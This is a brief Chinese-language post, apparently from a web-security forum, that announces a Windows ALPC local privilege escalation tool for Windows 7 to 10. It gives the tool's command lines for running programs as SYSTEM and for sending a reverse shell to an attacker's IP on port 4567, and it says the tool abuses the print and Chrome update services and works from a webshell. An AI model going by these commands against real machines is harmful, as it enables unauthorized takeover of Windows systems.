Advanced Local Procedure Call 利用
关于漏洞不多说什么自己看一下介绍,目前还没有为其分配编号,漏洞针对的是 win7 及 win7 以上到 win10 (因兼容引发的血案)
利用程序
EXP-LPE -e calc //执行命令,如果要执行程序要用绝对路径 EXP-LPE -g ip //反弹 shell 到 4567 端口
详细说明:
执行命令只能针对 win8 和 win8 以上要问为什么自己去把程序看看利用的是打印服务,利用谷歌浏览器更新服务反弹 shell 是可能有两个权限的一个是用户权限及手动更新服务和 system 系统权限开机延迟启动更新服务这里要说明如果需要的服务被禁用了那自然无法成功而且普通权限下也无法启动停止的服务但是以上这些服务默认都是开启的
webshell 下使用正常
写的匆忙还有一些功能没加还有这个程序可能有一些小 BUG
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
上一篇: 在 Django 中 如何为提高页面加载速度优化图像
下一篇: Windows 提权常用命令
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论